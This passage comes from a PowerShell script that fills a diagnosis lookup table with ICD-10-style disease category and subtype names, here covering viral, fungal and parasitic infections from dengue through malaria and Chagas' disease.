viral infection of central nervous system","Unspecified viral infection of central nervous system") + $null = $DiagnosisList.Rows.Add("Dengue fever [classical dengue]","Dengue fever [classical dengue]") + $null = $DiagnosisList.Rows.Add("Dengue hemorrhagic fever","Dengue hemorrhagic fever") + $null = $DiagnosisList.Rows.Add("Other mosquito-borne viral fevers","Chikungunya virus disease") + $null = $DiagnosisList.Rows.Add("Other mosquito-borne viral fevers","O'nyong-nyong fever") + $null = $DiagnosisList.Rows.Add("Other mosquito-borne viral fevers","Venezuelan equine fever") + $null = $DiagnosisList.Rows.Add("West Nile virus infection","West Nile virus infection, unspecified") + $null = $DiagnosisList.Rows.Add("West Nile virus infection","West Nile virus infection with encephalitis") + $null = $DiagnosisList.Rows.Add("West Nile virus infection","West Nile virus infection with other neurologic manifestation") + $null = $DiagnosisList.Rows.Add("West Nile virus infection","West Nile virus infection with other complications") + $null = $DiagnosisList.Rows.Add("Rift Valley fever","Rift Valley fever") + $null = $DiagnosisList.Rows.Add("Zika virus disease","Zika virus disease") + $null = $DiagnosisList.Rows.Add("Other specified mosquito-borne viral fevers","Other specified mosquito-borne viral fevers") + $null = $DiagnosisList.Rows.Add("Mosquito-borne viral fever, unspecified","Mosquito-borne viral fever, unspecified") + $null = $DiagnosisList.Rows.Add("Other arthropod-borne viral fevers, not elsewhere classified","Oropouche virus disease") + $null = $DiagnosisList.Rows.Add("Other arthropod-borne viral fevers, not elsewhere classified","Sandfly fever") + $null = $DiagnosisList.Rows.Add("Other arthropod-borne viral fevers, not elsewhere classified","Colorado tick fever") + $null = $DiagnosisList.Rows.Add("Other arthropod-borne viral fevers, not elsewhere classified","Other specified arthropod-borne viral fevers") + $null = $DiagnosisList.Rows.Add("Unspecified arthropod-borne viral fever","Unspecified arthropod-borne viral fever") + $null = $DiagnosisList.Rows.Add("Yellow fever","Sylvatic yellow fever") + $null = $DiagnosisList.Rows.Add("Yellow fever","Urban yellow fever") + $null = $DiagnosisList.Rows.Add("Yellow fever","Yellow fever, unspecified") + $null = $DiagnosisList.Rows.Add("Arenaviral hemorrhagic fever","Junin hemorrhagic fever") + $null = $DiagnosisList.Rows.Add("Arenaviral hemorrhagic fever","Machupo hemorrhagic fever") + $null = $DiagnosisList.Rows.Add("Arenaviral hemorrhagic fever","Lassa fever") + $null = $DiagnosisList.Rows.Add("Arenaviral hemorrhagic fever","Other arenaviral hemorrhagic fevers") + $null = $DiagnosisList.Rows.Add("Arenaviral hemorrhagic fever","Arenaviral hemorrhagic fever, unspecified") + $null = $DiagnosisList.Rows.Add("Other viral hemorrhagic fevers, not elsewhere classified","Crimean-Congo hemorrhagic fever") + $null = $DiagnosisList.Rows.Add("Other viral hemorrhagic fevers, not elsewhere classified","Omsk hemorrhagic fever") + $null = $DiagnosisList.Rows.Add("Other viral hemorrhagic fevers, not elsewhere classified","Kyasanur Forest disease") + $null = $DiagnosisList.Rows.Add("Other viral hemorrhagic fevers, not elsewhere classified","Marburg virus disease") + $null = $DiagnosisList.Rows.Add("Other viral hemorrhagic fevers, not elsewhere classified","Ebola virus disease") + $null = $DiagnosisList.Rows.Add("Other viral hemorrhagic fevers, not elsewhere classified","Hemorrhagic fever with renal syndrome") + $null = $DiagnosisList.Rows.Add("Other viral hemorrhagic fevers, not elsewhere classified","Other specified viral hemorrhagic fevers") + $null = $DiagnosisList.Rows.Add("Unspecified viral hemorrhagic fever","Unspecified viral hemorrhagic fever") + $null = $DiagnosisList.Rows.Add("Herpesviral [herpes simplex] infections","Eczema herpeticum") + $null = $DiagnosisList.Rows.Add("Herpesviral [herpes simplex] infections","Herpesviral vesicular dermatitis") + $null = $DiagnosisList.Rows.Add("Herpesviral [herpes simplex] infections","Herpesviral gingivostomatitis and pharyngotonsillitis") + $null = $DiagnosisList.Rows.Add("Herpesviral [herpes simplex] infections","Herpesviral meningitis") + $null = $DiagnosisList.Rows.Add("Herpesviral [herpes simplex] infections","Herpesviral encephalitis") + $null = $DiagnosisList.Rows.Add("Herpesviral ocular disease","Herpesviral ocular disease, unspecified") + $null = $DiagnosisList.Rows.Add("Herpesviral ocular disease","Herpesviral iridocyclitis") + $null = $DiagnosisList.Rows.Add("Herpesviral ocular disease","Herpesviral keratitis") + $null = $DiagnosisList.Rows.Add("Herpesviral ocular disease","Herpesviral conjunctivitis") + $null = $DiagnosisList.Rows.Add("Herpesviral ocular disease","Other herpesviral disease of eye") + $null = $DiagnosisList.Rows.Add("Disseminated herpesviral disease","Disseminated herpesviral disease") + $null = $DiagnosisList.Rows.Add("Other forms of herpesviral infections","Herpesviral hepatitis") + $null = $DiagnosisList.Rows.Add("Other forms of herpesviral infections","Herpes simplex myelitis") + $null = $DiagnosisList.Rows.Add("Other forms of herpesviral infections","Other herpesviral infection") + $null = $DiagnosisList.Rows.Add("Herpesviral infection, unspecified","Herpesviral infection, unspecified") + $null = $DiagnosisList.Rows.Add("Varicella [chickenpox]","Varicella meningitis") + $null = $DiagnosisList.Rows.Add("Varicella encephalitis, myelitis and encephalomyelitis","Varicella encephalitis and encephalomyelitis") + $null = $DiagnosisList.Rows.Add("Varicella encephalitis, myelitis and encephalomyelitis","Varicella myelitis") + $null = $DiagnosisList.Rows.Add("Varicella pneumonia","Varicella pneumonia") + $null = $DiagnosisList.Rows.Add("Varicella with other complications","Varicella keratitis") + $null = $DiagnosisList.Rows.Add("Varicella with other complications","Other varicella complications") + $null = $DiagnosisList.Rows.Add("Varicella without complication","Varicella without complication") + $null = $DiagnosisList.Rows.Add("Zoster [herpes zoster]","Zoster encephalitis") + $null = $DiagnosisList.Rows.Add("Zoster [herpes zoster]","Zoster meningitis") + $null = $DiagnosisList.Rows.Add("Zoster with other nervous system involvement","Postherpetic geniculate ganglionitis") + $null = $DiagnosisList.Rows.Add("Zoster with other nervous system involvement","Postherpetic trigeminal neuralgia") + $null = $DiagnosisList.Rows.Add("Zoster with other nervous system involvement","Postherpetic polyneuropathy") + $null = $DiagnosisList.Rows.Add("Zoster with other nervous system involvement","Postherpetic myelitis") + $null = $DiagnosisList.Rows.Add("Zoster with other nervous system involvement","Other postherpetic nervous system involvement") + $null = $DiagnosisList.Rows.Add("Zoster ocular disease","Zoster ocular disease, unspecified") + $null = $DiagnosisList.Rows.Add("Zoster ocular disease","Zoster conjunctivitis") + $null = $DiagnosisList.Rows.Add("Zoster ocular disease","Zoster iridocyclitis") + $null = $DiagnosisList.Rows.Add("Zoster ocular disease","Zoster keratitis") + $null = $DiagnosisList.Rows.Add("Zoster ocular disease","Zoster scleritis") + $null = $DiagnosisList.Rows.Add("Zoster ocular disease","Other herpes zoster eye disease") + $null = $DiagnosisList.Rows.Add("Disseminated zoster","Disseminated zoster") + $null = $DiagnosisList.Rows.Add("Zoster with other complications","Zoster with other complications") + $null = $DiagnosisList.Rows.Add("Zoster without complications","Zoster without complications") + $null = $DiagnosisList.Rows.Add("Smallpox","Smallpox") + $null = $DiagnosisList.Rows.Add("Monkeypox","Monkeypox") + $null = $DiagnosisList.Rows.Add("Measles","Measles complicated by encephalitis") + $null = $DiagnosisList.Rows.Add("Measles","Measles complicated by meningitis") + $null = $DiagnosisList.Rows.Add("Measles","Measles complicated by pneumonia") + $null = $DiagnosisList.Rows.Add("Measles","Measles complicated by otitis media") + $null = $DiagnosisList.Rows.Add("Measles","Measles with intestinal complications") + $null = $DiagnosisList.Rows.Add("Measles with other complications","Measles keratitis and keratoconjunctivitis") + $null = $DiagnosisList.Rows.Add("Measles with other complications","Other measles complications") + $null = $DiagnosisList.Rows.Add("Measles without complication","Measles without complication") + $null = $DiagnosisList.Rows.Add("Rubella with neurological complications","Rubella with neurological complication, unspecified") + $null = $DiagnosisList.Rows.Add("Rubella with neurological complications","Rubella encephalitis") + $null = $DiagnosisList.Rows.Add("Rubella with neurological complications","Rubella meningitis") + $null = $DiagnosisList.Rows.Add("Rubella with neurological complications","Other neurological complications of rubella") + $null = $DiagnosisList.Rows.Add("Rubella with other complications","Rubella pneumonia") + $null = $DiagnosisList.Rows.Add("Rubella with other complications","Rubella arthritis") + $null = $DiagnosisList.Rows.Add("Rubella with other complications","Other rubella complications") + $null = $DiagnosisList.Rows.Add("Rubella without complication","Rubella without complication") + $null = $DiagnosisList.Rows.Add("Viral warts","Plantar wart") + $null = $DiagnosisList.Rows.Add("Viral warts","Other viral warts") + $null = $DiagnosisList.Rows.Add("Viral warts","Viral wart, unspecified") + $null = $DiagnosisList.Rows.Add("Cowpox and vaccinia not from vaccine","Cowpox") + $null = $DiagnosisList.Rows.Add("Cowpox and vaccinia not from vaccine","Vaccinia not from vaccine") + $null = $DiagnosisList.Rows.Add("Orf virus disease","Orf virus disease") + $null = $DiagnosisList.Rows.Add("Pseudocowpox [milker's node]","Pseudocowpox [milker's node]") + $null = $DiagnosisList.Rows.Add("Paravaccinia, unspecified","Paravaccinia, unspecified") + $null = $DiagnosisList.Rows.Add("Other orthopoxvirus infections","Other orthopoxvirus infections") + $null = $DiagnosisList.Rows.Add("Molluscum contagiosum","Molluscum contagiosum") + $null = $DiagnosisList.Rows.Add("Exanthema subitum [sixth disease]","Exanthema subitum [sixth disease], unspecified") + $null = $DiagnosisList.Rows.Add("Exanthema subitum [sixth disease]","Exanthema subitum [sixth disease] due to human herpesvirus 6") + $null = $DiagnosisList.Rows.Add("Exanthema subitum [sixth disease]","Exanthema subitum [sixth disease] due to human herpesvirus 7") + $null = $DiagnosisList.Rows.Add("Erythema infectiosum [fifth disease]","Erythema infectiosum [fifth disease]") + $null = $DiagnosisList.Rows.Add("Enteroviral vesicular stomatitis with exanthem","Enteroviral vesicular stomatitis with exanthem") + $null = $DiagnosisList.Rows.Add("Enteroviral vesicular pharyngitis","Enteroviral vesicular pharyngitis") + $null = $DiagnosisList.Rows.Add("Parapoxvirus infections","Parapoxvirus infection, unspecified") + $null = $DiagnosisList.Rows.Add("Parapoxvirus infections","Bovine stomatitis") + $null = $DiagnosisList.Rows.Add("Parapoxvirus infections","Sealpox") + $null = $DiagnosisList.Rows.Add("Parapoxvirus infections","Other parapoxvirus infections") + $null = $DiagnosisList.Rows.Add("Yatapoxvirus infections","Yatapoxvirus infection, unspecified") + $null = $DiagnosisList.Rows.Add("Yatapoxvirus infections","Tanapox virus disease") + $null = $DiagnosisList.Rows.Add("Yatapoxvirus infections","Yaba pox virus disease") + $null = $DiagnosisList.Rows.Add("Yatapoxvirus infections","Other yatapoxvirus infections") + $null = $DiagnosisList.Rows.Add("Other specified viral infections characterized by skin and mucous membrane lesions","Other specified viral infections characterized by skin and mucous membrane lesions") + $null = $DiagnosisList.Rows.Add("Unspecified viral infection characterized by skin and mucous membrane lesions","Unspecified viral infection characterized by skin and mucous membrane lesions") + $null = $DiagnosisList.Rows.Add("Other human herpesvirus encephalitis","Human herpesvirus 6 encephalitis") + $null = $DiagnosisList.Rows.Add("Other human herpesvirus encephalitis","Other human herpesvirus encephalitis") + $null = $DiagnosisList.Rows.Add("Other human herpesvirus infection","Human herpesvirus 6 infection") + $null = $DiagnosisList.Rows.Add("Other human herpesvirus infection","Human herpesvirus 7 infection") + $null = $DiagnosisList.Rows.Add("Other human herpesvirus infection","Other human herpesvirus infection") + $null = $DiagnosisList.Rows.Add("Acute hepatitis A","Hepatitis A with hepatic coma") + $null = $DiagnosisList.Rows.Add("Acute hepatitis A","Hepatitis A without hepatic coma") + $null = $DiagnosisList.Rows.Add("Acute hepatitis B","Acute hepatitis B with delta-agent with hepatic coma") + $null = $DiagnosisList.Rows.Add("Acute hepatitis B","Acute hepatitis B with delta-agent without hepatic coma") + $null = $DiagnosisList.Rows.Add("Acute hepatitis B","Acute hepatitis B without delta-agent with hepatic coma") + $null = $DiagnosisList.Rows.Add("Acute hepatitis B","Acute hepatitis B without delta-agent and without hepatic coma") + $null = $DiagnosisList.Rows.Add("Other acute viral hepatitis","Acute delta-(super) infection of hepatitis B carrier") + $null = $DiagnosisList.Rows.Add("Acute hepatitis C","Acute hepatitis C without hepatic coma") + $null = $DiagnosisList.Rows.Add("Acute hepatitis C","Acute hepatitis C with hepatic coma") + $null = $DiagnosisList.Rows.Add("Acute hepatitis E","Acute hepatitis E") + $null = $DiagnosisList.Rows.Add("Other specified acute viral hepatitis","Other specified acute viral hepatitis") + $null = $DiagnosisList.Rows.Add("Acute viral hepatitis, unspecified","Acute viral hepatitis, unspecified") + $null = $DiagnosisList.Rows.Add("Chronic viral hepatitis","Chronic viral hepatitis B with delta-agent") + $null = $DiagnosisList.Rows.Add("Chronic viral hepatitis","Chronic viral hepatitis B without delta-agent") + $null = $DiagnosisList.Rows.Add("Chronic viral hepatitis","Chronic viral hepatitis C") + $null = $DiagnosisList.Rows.Add("Chronic viral hepatitis","Other chronic viral hepatitis") + $null = $DiagnosisList.Rows.Add("Chronic viral hepatitis","Chronic viral hepatitis, unspecified") + $null = $DiagnosisList.Rows.Add("Unspecified viral hepatitis","Unspecified viral hepatitis with hepatic coma") + $null = $DiagnosisList.Rows.Add("Unspecified viral hepatitis B","Unspecified viral hepatitis B without hepatic coma") + $null = $DiagnosisList.Rows.Add("Unspecified viral hepatitis B","Unspecified viral hepatitis B with hepatic coma") + $null = $DiagnosisList.Rows.Add("Unspecified viral hepatitis C","Unspecified viral hepatitis C without hepatic coma") + $null = $DiagnosisList.Rows.Add("Unspecified viral hepatitis C","Unspecified viral hepatitis C with hepatic coma") + $null = $DiagnosisList.Rows.Add("Unspecified viral hepatitis without hepatic coma","Unspecified viral hepatitis without hepatic coma") + $null = $DiagnosisList.Rows.Add("Human immunodeficiency virus [HIV] disease","Human immunodeficiency virus [HIV] disease") + $null = $DiagnosisList.Rows.Add("Cytomegaloviral disease","Cytomegaloviral pneumonitis") + $null = $DiagnosisList.Rows.Add("Cytomegaloviral disease","Cytomegaloviral hepatitis") + $null = $DiagnosisList.Rows.Add("Cytomegaloviral disease","Cytomegaloviral pancreatitis") + $null = $DiagnosisList.Rows.Add("Cytomegaloviral disease","Other cytomegaloviral diseases") + $null = $DiagnosisList.Rows.Add("Cytomegaloviral disease","Cytomegaloviral disease, unspecified") + $null = $DiagnosisList.Rows.Add("Mumps","Mumps orchitis") + $null = $DiagnosisList.Rows.Add("Mumps","Mumps meningitis") + $null = $DiagnosisList.Rows.Add("Mumps","Mumps encephalitis") + $null = $DiagnosisList.Rows.Add("Mumps","Mumps pancreatitis") + $null = $DiagnosisList.Rows.Add("Mumps with other complications","Mumps hepatitis") + $null = $DiagnosisList.Rows.Add("Mumps with other complications","Mumps myocarditis") + $null = $DiagnosisList.Rows.Add("Mumps with other complications","Mumps nephritis") + $null = $DiagnosisList.Rows.Add("Mumps with other complications","Mumps polyneuropathy") + $null = $DiagnosisList.Rows.Add("Mumps with other complications","Mumps arthritis") + $null = $DiagnosisList.Rows.Add("Mumps with other complications","Other mumps complications") + $null = $DiagnosisList.Rows.Add("Mumps without complication","Mumps without complication") + $null = $DiagnosisList.Rows.Add("Gammaherpesviral mononucleosis","Gammaherpesviral mononucleosis without complication") + $null = $DiagnosisList.Rows.Add("Gammaherpesviral mononucleosis","Gammaherpesviral mononucleosis with polyneuropathy") + $null = $DiagnosisList.Rows.Add("Gammaherpesviral mononucleosis","Gammaherpesviral mononucleosis with meningitis") + $null = $DiagnosisList.Rows.Add("Gammaherpesviral mononucleosis","Gammaherpesviral mononucleosis with other complications") + $null = $DiagnosisList.Rows.Add("Cytomegaloviral mononucleosis","Cytomegaloviral mononucleosis without complications") + $null = $DiagnosisList.Rows.Add("Cytomegaloviral mononucleosis","Cytomegaloviral mononucleosis with polyneuropathy") + $null = $DiagnosisList.Rows.Add("Cytomegaloviral mononucleosis","Cytomegaloviral mononucleosis with meningitis") + $null = $DiagnosisList.Rows.Add("Cytomegaloviral mononucleosis","Cytomegaloviral mononucleosis with other complication") + $null = $DiagnosisList.Rows.Add("Other infectious mononucleosis","Other infectious mononucleosis without complication") + $null = $DiagnosisList.Rows.Add("Other infectious mononucleosis","Other infectious mononucleosis with polyneuropathy") + $null = $DiagnosisList.Rows.Add("Other infectious mononucleosis","Other infectious mononucleosis with meningitis") + $null = $DiagnosisList.Rows.Add("Other infectious mononucleosis","Other infectious mononucleosis with other complication") + $null = $DiagnosisList.Rows.Add("Infectious mononucleosis, unspecified","Infectious mononucleosis, unspecified without complication") + $null = $DiagnosisList.Rows.Add("Infectious mononucleosis, unspecified","Infectious mononucleosis, unspecified with polyneuropathy") + $null = $DiagnosisList.Rows.Add("Infectious mononucleosis, unspecified","Infectious mononucleosis, unspecified with meningitis") + $null = $DiagnosisList.Rows.Add("Infectious mononucleosis, unspecified","Infectious mononucleosis, unspecified with other complication") + $null = $DiagnosisList.Rows.Add("Viral conjunctivitis","Keratoconjunctivitis due to adenovirus") + $null = $DiagnosisList.Rows.Add("Viral conjunctivitis","Conjunctivitis due to adenovirus") + $null = $DiagnosisList.Rows.Add("Viral conjunctivitis","Viral pharyngoconjunctivitis") + $null = $DiagnosisList.Rows.Add("Viral conjunctivitis","Acute epidemic hemorrhagic conjunctivitis (enteroviral)") + $null = $DiagnosisList.Rows.Add("Viral conjunctivitis","Other viral conjunctivitis") + $null = $DiagnosisList.Rows.Add("Viral conjunctivitis","Viral conjunctivitis, unspecified") + $null = $DiagnosisList.Rows.Add("Other viral diseases, not elsewhere classified","Epidemic myalgia") + $null = $DiagnosisList.Rows.Add("Other viral diseases, not elsewhere classified","Ross River disease") + $null = $DiagnosisList.Rows.Add("Viral carditis","Viral carditis, unspecified") + $null = $DiagnosisList.Rows.Add("Viral carditis","Viral endocarditis") + $null = $DiagnosisList.Rows.Add("Viral carditis","Viral myocarditis") + $null = $DiagnosisList.Rows.Add("Viral carditis","Viral pericarditis") + $null = $DiagnosisList.Rows.Add("Viral carditis","Viral cardiomyopathy") + $null = $DiagnosisList.Rows.Add("Retrovirus infections, not elsewhere classified","Retrovirus infections, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Hantavirus (cardio)-pulmonary syndrome [HPS] [HCPS]","Hantavirus (cardio)-pulmonary syndrome [HPS] [HCPS]") + $null = $DiagnosisList.Rows.Add("Other specified viral diseases","Other specified viral diseases") + $null = $DiagnosisList.Rows.Add("Viral infection of unspecified site","Adenovirus infection, unspecified") + $null = $DiagnosisList.Rows.Add("Viral infection of unspecified site","Enterovirus infection, unspecified") + $null = $DiagnosisList.Rows.Add("Viral infection of unspecified site","Coronavirus infection, unspecified") + $null = $DiagnosisList.Rows.Add("Viral infection of unspecified site","Parvovirus infection, unspecified") + $null = $DiagnosisList.Rows.Add("Viral infection of unspecified site","Papovavirus infection, unspecified") + $null = $DiagnosisList.Rows.Add("Viral infection of unspecified site","Other viral infections of unspecified site") + $null = $DiagnosisList.Rows.Add("Viral infection of unspecified site","Viral infection, unspecified") + $null = $DiagnosisList.Rows.Add("Dermatophytosis","Tinea barbae and tinea capitis") + $null = $DiagnosisList.Rows.Add("Dermatophytosis","Tinea unguium") + $null = $DiagnosisList.Rows.Add("Dermatophytosis","Tinea manuum") + $null = $DiagnosisList.Rows.Add("Dermatophytosis","Tinea pedis") + $null = $DiagnosisList.Rows.Add("Dermatophytosis","Tinea corporis") + $null = $DiagnosisList.Rows.Add("Dermatophytosis","Tinea imbricata") + $null = $DiagnosisList.Rows.Add("Dermatophytosis","Tinea cruris") + $null = $DiagnosisList.Rows.Add("Dermatophytosis","Other dermatophytoses") + $null = $DiagnosisList.Rows.Add("Dermatophytosis","Dermatophytosis, unspecified") + $null = $DiagnosisList.Rows.Add("Other superficial mycoses","Pityriasis versicolor") + $null = $DiagnosisList.Rows.Add("Other superficial mycoses","Tinea nigra") + $null = $DiagnosisList.Rows.Add("Other superficial mycoses","White piedra") + $null = $DiagnosisList.Rows.Add("Other superficial mycoses","Black piedra") + $null = $DiagnosisList.Rows.Add("Other superficial mycoses","Other specified superficial mycoses") + $null = $DiagnosisList.Rows.Add("Other superficial mycoses","Superficial mycosis, unspecified") + $null = $DiagnosisList.Rows.Add("Candidiasis","Candidal stomatitis") + $null = $DiagnosisList.Rows.Add("Candidiasis","Pulmonary candidiasis") + $null = $DiagnosisList.Rows.Add("Candidiasis","Candidiasis of skin and nail") + $null = $DiagnosisList.Rows.Add("Candidiasis","Candidiasis of vulva and vagina") + $null = $DiagnosisList.Rows.Add("Candidiasis of other urogenital sites","Candidal cystitis and urethritis") + $null = $DiagnosisList.Rows.Add("Candidiasis of other urogenital sites","Candidal balanitis") + $null = $DiagnosisList.Rows.Add("Candidiasis of other urogenital sites","Other urogenital candidiasis") + $null = $DiagnosisList.Rows.Add("Candidal meningitis","Candidal meningitis") + $null = $DiagnosisList.Rows.Add("Candidal endocarditis","Candidal endocarditis") + $null = $DiagnosisList.Rows.Add("Candidal sepsis","Candidal sepsis") + $null = $DiagnosisList.Rows.Add("Candidiasis of other sites","Candidal esophagitis") + $null = $DiagnosisList.Rows.Add("Candidiasis of other sites","Candidal enteritis") + $null = $DiagnosisList.Rows.Add("Candidiasis of other sites","Candidal cheilitis") + $null = $DiagnosisList.Rows.Add("Candidiasis of other sites","Candidal otitis externa") + $null = $DiagnosisList.Rows.Add("Candidiasis of other sites","Other sites of candidiasis") + $null = $DiagnosisList.Rows.Add("Candidiasis, unspecified","Candidiasis, unspecified") + $null = $DiagnosisList.Rows.Add("Coccidioidomycosis","Acute pulmonary coccidioidomycosis") + $null = $DiagnosisList.Rows.Add("Coccidioidomycosis","Chronic pulmonary coccidioidomycosis") + $null = $DiagnosisList.Rows.Add("Coccidioidomycosis","Pulmonary coccidioidomycosis, unspecified") + $null = $DiagnosisList.Rows.Add("Coccidioidomycosis","Cutaneous coccidioidomycosis") + $null = $DiagnosisList.Rows.Add("Coccidioidomycosis","Coccidioidomycosis meningitis") + $null = $DiagnosisList.Rows.Add("Coccidioidomycosis","Disseminated coccidioidomycosis") + $null = $DiagnosisList.Rows.Add("Other forms of coccidioidomycosis","Prostatic coccidioidomycosis") + $null = $DiagnosisList.Rows.Add("Other forms of coccidioidomycosis","Other forms of coccidioidomycosis") + $null = $DiagnosisList.Rows.Add("Coccidioidomycosis, unspecified","Coccidioidomycosis, unspecified") + $null = $DiagnosisList.Rows.Add("Histoplasmosis","Acute pulmonary histoplasmosis capsulati") + $null = $DiagnosisList.Rows.Add("Histoplasmosis","Chronic pulmonary histoplasmosis capsulati") + $null = $DiagnosisList.Rows.Add("Histoplasmosis","Pulmonary histoplasmosis capsulati, unspecified") + $null = $DiagnosisList.Rows.Add("Histoplasmosis","Disseminated histoplasmosis capsulati") + $null = $DiagnosisList.Rows.Add("Histoplasmosis","Histoplasmosis capsulati, unspecified") + $null = $DiagnosisList.Rows.Add("Histoplasmosis","Histoplasmosis duboisii") + $null = $DiagnosisList.Rows.Add("Histoplasmosis","Histoplasmosis, unspecified") + $null = $DiagnosisList.Rows.Add("Blastomycosis","Acute pulmonary blastomycosis") + $null = $DiagnosisList.Rows.Add("Blastomycosis","Chronic pulmonary blastomycosis") + $null = $DiagnosisList.Rows.Add("Blastomycosis","Pulmonary blastomycosis, unspecified") + $null = $DiagnosisList.Rows.Add("Blastomycosis","Cutaneous blastomycosis") + $null = $DiagnosisList.Rows.Add("Blastomycosis","Disseminated blastomycosis") + $null = $DiagnosisList.Rows.Add("Other forms of blastomycosis","Blastomycotic meningoencephalitis") + $null = $DiagnosisList.Rows.Add("Other forms of blastomycosis","Other forms of blastomycosis") + $null = $DiagnosisList.Rows.Add("Blastomycosis, unspecified","Blastomycosis, unspecified") + $null = $DiagnosisList.Rows.Add("Paracoccidioidomycosis","Pulmonary paracoccidioidomycosis") + $null = $DiagnosisList.Rows.Add("Paracoccidioidomycosis","Disseminated paracoccidioidomycosis") + $null = $DiagnosisList.Rows.Add("Paracoccidioidomycosis","Other forms of paracoccidioidomycosis") + $null = $DiagnosisList.Rows.Add("Paracoccidioidomycosis","Paracoccidioidomycosis, unspecified") + $null = $DiagnosisList.Rows.Add("Sporotrichosis","Pulmonary sporotrichosis") + $null = $DiagnosisList.Rows.Add("Sporotrichosis","Lymphocutaneous sporotrichosis") + $null = $DiagnosisList.Rows.Add("Sporotrichosis","Disseminated sporotrichosis") + $null = $DiagnosisList.Rows.Add("Other forms of sporotrichosis","Cerebral sporotrichosis") + $null = $DiagnosisList.Rows.Add("Other forms of sporotrichosis","Sporotrichosis arthritis") + $null = $DiagnosisList.Rows.Add("Other forms of sporotrichosis","Other forms of sporotrichosis") + $null = $DiagnosisList.Rows.Add("Sporotrichosis, unspecified","Sporotrichosis, unspecified") + $null = $DiagnosisList.Rows.Add("Chromomycosis and pheomycotic abscess","Cutaneous chromomycosis") + $null = $DiagnosisList.Rows.Add("Chromomycosis and pheomycotic abscess","Pheomycotic brain abscess") + $null = $DiagnosisList.Rows.Add("Chromomycosis and pheomycotic abscess","Subcutaneous pheomycotic abscess and cyst") + $null = $DiagnosisList.Rows.Add("Chromomycosis and pheomycotic abscess","Other forms of chromomycosis") + $null = $DiagnosisList.Rows.Add("Chromomycosis and pheomycotic abscess","Chromomycosis, unspecified") + $null = $DiagnosisList.Rows.Add("Aspergillosis","Invasive pulmonary aspergillosis") + $null = $DiagnosisList.Rows.Add("Aspergillosis","Other pulmonary aspergillosis") + $null = $DiagnosisList.Rows.Add("Aspergillosis","Tonsillar aspergillosis") + $null = $DiagnosisList.Rows.Add("Aspergillosis","Disseminated aspergillosis") + $null = $DiagnosisList.Rows.Add("Other forms of aspergillosis","Allergic bronchopulmonary aspergillosis") + $null = $DiagnosisList.Rows.Add("Other forms of aspergillosis","Other forms of aspergillosis") + $null = $DiagnosisList.Rows.Add("Aspergillosis, unspecified","Aspergillosis, unspecified") + $null = $DiagnosisList.Rows.Add("Cryptococcosis","Pulmonary cryptococcosis") + $null = $DiagnosisList.Rows.Add("Cryptococcosis","Cerebral cryptococcosis") + $null = $DiagnosisList.Rows.Add("Cryptococcosis","Cutaneous cryptococcosis") + $null = $DiagnosisList.Rows.Add("Cryptococcosis","Osseous cryptococcosis") + $null = $DiagnosisList.Rows.Add("Cryptococcosis","Disseminated cryptococcosis") + $null = $DiagnosisList.Rows.Add("Cryptococcosis","Other forms of cryptococcosis") + $null = $DiagnosisList.Rows.Add("Cryptococcosis","Cryptococcosis, unspecified") + $null = $DiagnosisList.Rows.Add("Zygomycosis","Pulmonary mucormycosis") + $null = $DiagnosisList.Rows.Add("Zygomycosis","Rhinocerebral mucormycosis") + $null = $DiagnosisList.Rows.Add("Zygomycosis","Gastrointestinal mucormycosis") + $null = $DiagnosisList.Rows.Add("Zygomycosis","Cutaneous mucormycosis") + $null = $DiagnosisList.Rows.Add("Zygomycosis","Disseminated mucormycosis") + $null = $DiagnosisList.Rows.Add("Zygomycosis","Mucormycosis, unspecified") + $null = $DiagnosisList.Rows.Add("Zygomycosis","Other zygomycoses") + $null = $DiagnosisList.Rows.Add("Zygomycosis","Zygomycosis, unspecified") + $null = $DiagnosisList.Rows.Add("Mycetoma","Eumycetoma") + $null = $DiagnosisList.Rows.Add("Mycetoma","Actinomycetoma") + $null = $DiagnosisList.Rows.Add("Mycetoma","Mycetoma, unspecified") + $null = $DiagnosisList.Rows.Add("Other mycoses, not elsewhere classified","Lobomycosis") + $null = $DiagnosisList.Rows.Add("Other mycoses, not elsewhere classified","Rhinosporidiosis") + $null = $DiagnosisList.Rows.Add("Other mycoses, not elsewhere classified","Allescheriasis") + $null = $DiagnosisList.Rows.Add("Other mycoses, not elsewhere classified","Geotrichosis") + $null = $DiagnosisList.Rows.Add("Other mycoses, not elsewhere classified","Penicillosis") + $null = $DiagnosisList.Rows.Add("Other mycoses, not elsewhere classified","Other specified mycoses") + $null = $DiagnosisList.Rows.Add("Unspecified mycosis","Unspecified mycosis") + $null = $DiagnosisList.Rows.Add("Plasmodium falciparum malaria","Plasmodium falciparum malaria with cerebral complications") + $null = $DiagnosisList.Rows.Add("Plasmodium falciparum malaria","Other severe and complicated Plasmodium falciparum malaria") + $null = $DiagnosisList.Rows.Add("Plasmodium falciparum malaria","Plasmodium falciparum malaria, unspecified") + $null = $DiagnosisList.Rows.Add("Plasmodium vivax malaria","Plasmodium vivax malaria with rupture of spleen") + $null = $DiagnosisList.Rows.Add("Plasmodium vivax malaria","Plasmodium vivax malaria with other complications") + $null = $DiagnosisList.Rows.Add("Plasmodium vivax malaria","Plasmodium vivax malaria without complication") + $null = $DiagnosisList.Rows.Add("Plasmodium malariae malaria","Plasmodium malariae malaria with nephropathy") + $null = $DiagnosisList.Rows.Add("Plasmodium malariae malaria","Plasmodium malariae malaria with other complications") + $null = $DiagnosisList.Rows.Add("Plasmodium malariae malaria","Plasmodium malariae malaria without complication") + $null = $DiagnosisList.Rows.Add("Other specified malaria","Plasmodium ovale malaria") + $null = $DiagnosisList.Rows.Add("Other specified malaria","Malaria due to simian plasmodia") + $null = $DiagnosisList.Rows.Add("Other specified malaria","Other malaria, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Unspecified malaria","Unspecified malaria") + $null = $DiagnosisList.Rows.Add("Leishmaniasis","Visceral leishmaniasis") + $null = $DiagnosisList.Rows.Add("Leishmaniasis","Cutaneous leishmaniasis") + $null = $DiagnosisList.Rows.Add("Leishmaniasis","Mucocutaneous leishmaniasis") + $null = $DiagnosisList.Rows.Add("Leishmaniasis","Leishmaniasis, unspecified") + $null = $DiagnosisList.Rows.Add("African trypanosomiasis","Gambiense trypanosomiasis") + $null = $DiagnosisList.Rows.Add("African trypanosomiasis","Rhodesiense trypanosomiasis") + $null = $DiagnosisList.Rows.Add("African trypanosomiasis","African trypanosomiasis, unspecified") + $null = $DiagnosisList.Rows.Add("Chagas' disease","Acute Chagas' disease with heart involvement") + $null = $DiagnosisList.Rows.Add("Chagas' disease","Acute Chagas' disease without heart involvement") + $null = $DiagnosisList.Rows.Add("Chagas' 